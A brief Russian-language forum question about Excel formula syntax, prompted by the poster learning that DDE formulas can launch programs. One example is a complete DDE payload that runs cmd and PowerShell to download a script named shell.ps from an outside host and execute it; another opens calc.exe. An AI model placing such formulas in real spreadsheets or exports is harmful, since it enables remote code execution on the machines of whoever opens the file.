Я недавно обнаружил, что формулы Excel поддерживают доступ к DDE (Dynamic Data Exchange).В соответствии с PenTest Magazine также возможно запускать исполняемые файлы, используя это.Это делает меня любопытным.
Есть ли документация по синтаксису формулы Excel?Существуют ли другие функции, которые в основном неизвестны?
Примеры:
DDE (динамический обмен данными)
=pyserver|test!DATA
Исполняемые файлы вызова
=cmd|’/Cpowershell Import-Module BitsTransfer; Start-BitsTransfer – source https://141.io/shell.ps; Invoke-Item shell.ps;’!z
=cmd|’/Ccalc.exe’!z